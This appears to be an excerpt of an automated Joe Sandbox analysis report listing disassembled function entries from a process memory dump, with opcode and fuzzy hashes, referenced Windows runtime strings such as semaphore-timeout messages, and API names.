                                                            • Opcode ID: 8e9e3db8b4d3de7b429b51f864e438d8ea9d340aad2c22bae6e3529dff58297f
                                                            • Instruction ID: 60021fdf712505326a2cd40446fb179ac980979b0fe17fa11d9be2d72b99dd92
                                                            • Opcode Fuzzy Hash: 8e9e3db8b4d3de7b429b51f864e438d8ea9d340aad2c22bae6e3529dff58297f
                                                            • Instruction Fuzzy Hash: 7EE1FE706487419FDB26EF28C884B2AB7E1BF84318F144A2DF4A68B7D1D774D844CB52
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 02E37B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02E37B7F
                                                            • RTL: Re-Waiting, xrefs: 02E37BAC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 2e37ee92ebf6f67e0a7bb77c6fcda0b0ccce890f3631d1e11be11297b3a818a5
                                                            • Instruction ID: 73fea1972fb8d05d6b420ff3c16f3521e9487c1121c58d95a9d3cc2eb055d504
                                                            • Opcode Fuzzy Hash: 2e37ee92ebf6f67e0a7bb77c6fcda0b0ccce890f3631d1e11be11297b3a818a5
                                                            • Instruction Fuzzy Hash: D941E1317447029FD721CE25C850B6AB7E6EF88719F014A1EFA9A9B780DB31E805CF95
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E3728C
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 02E372A3
                                                            • RTL: Re-Waiting, xrefs: 02E372C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02E37294
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: a6576d3bbee645fb6546a50c8bed8fedd32eaf4d9fa5274ff6836458a365000d
                                                            • Instruction ID: 631898d2385c024ba973e27ef7a8e0324550a5a4dff648f56c31b2d9b78feece
                                                            • Opcode Fuzzy Hash: a6576d3bbee645fb6546a50c8bed8fedd32eaf4d9fa5274ff6836458a365000d
                                                            • Instruction Fuzzy Hash: CD410FB1780202ABD721CE25CC41F66B7A5FF88719F109619FE99AB340DB21E846CBD4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 88915021bdd239b0aea4dd96509e4970a9aa7b399f9d42f50080e2ef6b9d537f
                                                            • Instruction ID: 61123009013dd96f57d7ba24c730d6337922e68339b083563721bb7bf8cf01b3
                                                            • Opcode Fuzzy Hash: 88915021bdd239b0aea4dd96509e4970a9aa7b399f9d42f50080e2ef6b9d537f
                                                            • Instruction Fuzzy Hash: 99319872A4021AAFDB20DF29DC40BEE77F9EF44714F849555ED49E3240EB30AA459FA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: a066c503b539621cc556e1309aeededfe4aec14b09c98543016f13f4f523adfc
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 8D918670E802159ADB24DE69C8C0BBEF7A5EF45768F14E61AE855A72C0D730A9C3CB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 070abf8248f7fa6caf26cce6562d47b85e1ea4d76c6c887e6d8a05bf809e4f80
                                                            • Instruction ID: 4986269fcbab6fa4e7fc60d773ebd0939302fcbc9f0d1f84527c974266461b4e
                                                            • Opcode Fuzzy Hash: 070abf8248f7fa6caf26cce6562d47b85e1ea4d76c6c887e6d8a05bf809e4f80
                                                            • Instruction Fuzzy Hash: 30812E72D402699BDB31DB54CC55BEEB7B8AB08714F1081DAAA1AB7240D7705E84CFA0